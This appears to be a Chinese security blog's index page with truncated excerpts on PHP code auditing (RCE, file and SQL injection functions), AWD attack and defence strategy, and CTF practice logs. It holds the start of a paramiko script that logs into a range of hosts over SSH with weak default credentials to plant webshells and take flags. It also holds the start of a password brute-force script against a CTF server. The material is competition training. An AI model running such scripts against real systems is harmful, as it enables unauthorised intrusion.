php代码审计-命令执行RCE篇
php命令执行函数php原生的命令执行函数如下,一共7个 system passthru (语法与system类似) exec(需要输出函数才能执行,** **) shell_exec (与exec一样,语法如下echo shell_exec(“tac flag.php”);) popen (格式语法如下popen(command,mode) command 必需。规定要执行的命令。 mode 必需。规定连接模式。可能的值:+ r: 只读。+ w: 只写...
php代码审计-任意文件操作篇
常见的一些文件类的危险函数文件包含 include require include_once require_once sql_autoload 文件读取 file_get_contents php://filter 绕过死亡file_put_content() base64...
php代码审计-sql注入篇
sql注入是php代码审计的主要漏洞点之一,另一个是upload 反向查找流程: 通过可控变量(输入点)回溯危险函数 查找危险函数确定可控变量 传递的过程中触发漏洞 但是上述的流程也并不完全的正确,例如有些铭感函数虽然出现在了程序当中,但是触发的流程需要经过转义注释等,那么这个函数就不构成威胁 具体反向查找的例子:B-blog-bind xxe 反向查找流程特点 上下文无关 危险函数,调用即漏洞 根源:危险函数导致漏洞 特点: 暴力:全局搜索危险函数 简单:无需过多理解目标网站功能与框架 快速:适用于自动化代码审计工具 无法挖掘逻辑漏洞:逻辑漏洞一般不存在危险函数,或危险函数的参数看似不可控 适应性较差:不适合存在全局过滤的站点 正向查找流程: 从入口函数出发 找到控制器,理解url派发规则 跟踪控制器调用,以理解代码作为目标进行源码阅读 阅代码的过程中,可能发现漏洞 具体正向查找的例子:PHPCMSv9.6.0...
php代码审计-全局配置篇
关于php运行服务的方式除了依赖中间件的方式除外还有php -S 127.0.0.1:9000这种方式 这点与python高度类似、 关于php函数中的那些危险全局变量magic_quotes_gpc这个函数多用于数据库等接口等铭感程序,magic_quotes_gpc函数在php中的作用是判断解析用户提示的数据,如包括有:post、get、cookie过来的数据增加转义字符“\”,对POST、𝑃𝑂𝑆𝑇 __GET以及进行数据库操作的sql进行转义处理,以确保这些数据不会引起程序,特别是数据库语句因为特殊字符引起的污染而出现致命的错误。防止sql注入(在5.3被废弃,在5.4后移除) 关于其相关配置当PHP...
AWD/AWDP红队基本攻击策略
基本攻击策略1、弱口令攻击批量用户登入修改密码并写入webshell且获取flag值。 攻击exp 1234567891011121314151617#!/usr/bin/env python#-*- coding:utf-8 -*-import paramiko for i in [1,2,3,4,5,6,7,8,9,10]:try:host = "4.4."+str(i)+".100"s=paramiko.SSHClient()s.set_missing_host_key_policy(paramiko.AutoAddPolicy())s.connect(hostname=host,port=22,username='user1',password='123456')stdin,stdout,stderr =...
AWD/AWDP蓝队最基本的防御策列
切记!!!!!!!!!!!!!!先别急着上waf,先看一些最基本的本地设置!!!!!! 1、改用户密码和服务密码1)改linux用户密码: 1#passwd 密码强度一定要高,防止弱口令爆破!设置前需要和队友进行交流!!!!!! 如果有权限就删除用户: 打开/etc/passwd/目录下 看到用户后面带/bin/bash的全删了,这代表该账号可以进行远程登录 删除用户的命令为 1#userdel -r [用户名] 2)改mysql密码:1#update mysql.user set password=password('密码') where user='root'; 删除匿名用户: 1#delete from mysql.user where user=' '; 刷新配置: 1#flush...
刷题
完成事项 刷题 未完成的事项 暂时没有 下周待做的事 刷题 本周知识分享[NISACTF 2022]hardsql有点意思的一题 首先更具题目的提示得知这用户名为bilala,而且passwd处是爆破点,那么构造脚本爆破密码 123456789101112131415import requestsurl='http://node5.anna.nssctf.cn:20055/login.php'str= '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'flag=''for i in range(62): for j in str: data= { ...
不知道在干什么
完成事项 刷题 复现环境 写教案(非盈利) 未完成的事项 暂时没有 下周待做的事 学学学 挖洞 本周知识分享[TQLCTF 2022]simple_bypass少见给我写笑了的题目 一个注册框,注册一下 到了后台,这前后段交互写的也太好了 一时半会没找到漏洞点,那么对系统进行更深的发掘还是发现了漏洞点 在杰哥这里找道了任意文件读写的漏洞点,大致原理就是找到指定文件并以base64的方式编码最后以jpg的方式显示 读到了index.php文件 1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phperror_reporting(0);if(isset($_POST['user']) && isset($_POST['pass'])){ $hash_user = md5($_POST['user']); $hash_pass =...
php代码审计-小技巧篇
白盒测试常见疑问 基本web漏洞都有所了解,但实际漏洞挖掘过程中,为什么挖不倒漏洞 上述问题非常常见,例如:我们在挖掘漏洞时,看到很多地方都做了漏洞防护和预处理,但是并不意味着所有的漏洞防护和预处理都是有效的,要多尝试, 代码量增加后,如何快速地找到漏洞 急于求成就暴力搜索, 深度挖掘就全局审计,安稳点就半审半搜 如何挖掘对安全有一定防御的代码中的漏洞 目标使用了现在php框架,很难找到常见漏洞,怎么突破 这种现代框架,只要你是按照产品手册写,很难写出漏洞,那么怎么突破 你所需要的两个知识 白盒基本方法 白盒测试技巧 现代web开发框架下的php漏洞现代web开发框架 Laravel symfony slimphp Yii2 特点 所需PHP版本较高,\0截断等老漏洞绝迹 提供功能强大的orm 提供自动处理输出的模板引擎 开发者可以通过composer找到任何需要的功能类,避免因为自己造轮子产生的漏洞 现代web开发框架安全思想 secure by...
web-刷题-枫何
完成事项 刷题 搭建博客 未完成的事项 暂时没有 下周待做的事 刷题 本周知识分享[CISCN 2019华东南]Web4url暴露了是ssrf 也确实是 响应头回显python,那么唯一能说的通的就是这题考点是flask 事实也确实如此 得到源码 12345678910111213141516171819202122232425262728293031323334353637383940# encoding:utf-8import reimport randomimport uuidimport urllibfrom flask import Flask, session, requestapp = Flask(__name__)random.seed(uuid.getnode())app.config['SECRET_KEY'] = str(random.random() * 233)app.debug = True@app.route('/')def index(): ...
